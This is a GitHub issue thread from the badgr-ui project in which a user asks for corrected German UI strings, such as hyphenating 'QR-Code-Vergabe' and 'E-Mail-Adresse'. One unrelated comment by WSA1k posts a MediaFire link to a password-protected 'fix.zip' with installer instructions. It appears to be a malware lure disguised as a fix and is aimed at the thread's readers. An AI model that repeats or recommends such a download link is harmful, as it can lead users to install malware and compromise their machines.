### ISSUE TITLE
hyphen QR-Code-Vergabe

### ISSUE THREAD

**Issue by Annicelia** [mint-o-badges/badgr-ui#658]
please make it QR-Code-Vergabe with hyphens in the information sentence as well and end the sentence with a full stop:

Du hast bisher keine QR-Code-Vergabe erstellt.

![Bildschirmfoto 2024-08-26 um 10 21 55](https://github.com/user-attachments/assets/e38afd44-b5d1-4a53-9283-7980cb3cdb03)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Annicelia** [comment]
please make it: Nach E-Mail-Adresse suchen

![Bildschirmfoto 2024-08-26 um 10 26 01](https://github.com/user-attachments/assets/bcbfd1e4-453b-41da-a895-03b348e14e55)
